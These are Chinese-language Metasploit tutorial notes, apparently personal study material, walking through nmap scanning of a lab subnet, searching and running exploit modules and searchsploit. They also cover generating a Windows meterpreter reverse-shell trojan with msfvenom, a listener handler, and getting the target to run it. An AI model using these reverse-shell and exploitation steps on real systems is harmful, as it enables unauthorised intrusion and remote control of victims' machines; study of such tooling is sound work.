1. msf使用:
使用前的准备:
-
连接msf的数据库,启动msf数据库:
systemctl start postgresql
-
先用nmap扫描:
-
nmap -sn 192.168.137.0/24
,看看哪些主机存活。 -
nmap --min-rate 10000 -p- 192.168.137.128
,用最慢10000的速度扫描ip端口。 -
nmap --script=vuln -p 刚刚扫出来开放的端口号 192.168.112.158
去扫描一下开放的端口号存在哪些可以利用的漏洞编号。 -
这一步也可以在msf里使用msf的nmap。如:
db_nmap -sn 192.168.137.0/24
,都是一样的
-
启动msf:
-
msfconsole
启动msf -
找到漏洞编号之后,
search 漏洞编号
,找到suxiliary开头的辅助模块,先探测一下这个漏洞是否可能利用,比如是第4个,那么就use 4
,也可以use 具体文件的位置
,exploit开头的则是exp漏洞利用模块,先探测如果可行,再使用exp模块,使用方法一样。这个是在库里搜索漏洞编号,如果没有可以利用的exp,可以直接在kali命令行searchsploit 漏洞编号
看看在线库是否有可利用的exp。 -
进入到模块之后,
show options
看一下当前模块的选项。 -
必选的选项但是没值的话,要set上,比如:
set rhosts 192.168.137.131
,rhosts表示目标主机。 -
都设置好之后可以
run
.
利用searchsploit找漏洞并利用:
-
如果msf自带的库里
search
不到,那么利用之前信息搜集收集到的web容器版本,数据库版本,操作系统版本等,用searchsploit
搜索漏洞,如:searchsploit dirty
搜索dirty的cms漏洞。 -
得到代码名之后,
searchsploit -p 40847
显示文件位置。 -
然后具体的编译命令和用法在文件里都有说明,直接在文件里找。如:
msfvenom生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe -o shell.exe
用msfvenom模块生成一个基于tcp的反弹shell木马为shell.exe,攻击机为:192.168.112.148,监听端口为:4444 ,-f
是生成的木马类型,这里是.exe文件,-o
是指定名字,也可以用>
代替,如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe > shell.exe
此时生成的是一个.exe文件,我们需要将这个.exe文件交给目标,让目标把.exe文件放在目标主机上我们才能运行,或者我们可以上传到目标主机。
接受:
- 在msf中打开MSF的监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
指定payload,这个payload就是刚刚上面使用的payloadshow options
set lhost 192.168.112.148
指定攻击机的地址set lport 4444
指定攻击机打开的监听端口run